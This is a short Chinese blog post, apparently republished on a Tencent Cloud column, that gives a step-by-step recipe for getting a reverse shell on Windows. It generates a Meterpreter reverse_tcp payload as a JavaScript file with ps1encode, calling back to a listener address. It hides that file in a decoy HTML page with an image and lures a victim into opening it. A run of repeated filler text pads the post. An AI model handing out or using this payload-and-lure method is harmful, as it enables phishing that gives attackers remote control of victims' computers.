首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >使用JS文件反弹shell

使用JS文件反弹shell

作者头像
Al1ex
发布2021-07-21 16:31:40
发布2021-07-21 16:31:40
3.3K0
举报
文章被收录于专栏:网络安全攻防网络安全攻防
利用工具

项目地址:https://github.com/CroweCybersecurity/ps1encode

适用场景:目标主机Windows系列

攻击流程

1、下载ps1encode:

2、生成载荷

代码语言:javascript
复制
./ps1encode.rb --LHOST 192.168.67.128 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js >> shell.js

3、使用Msf进行本地监听

4、创建隐蔽的html文件以及图片文件进行迷惑用户,在html文件中引用恶意的JS文件:

代码语言:javascript
复制
<html>
<title>SimpleTest</title>
<body>
<img src='1.png'>
<script src='shell.js'></script>
</body>
</html>

5、之后将恶意文件发送给用户诱导用户访问hello.html:

6、之后成功反弹shell回来

凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 利用工具
  • 攻击流程
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档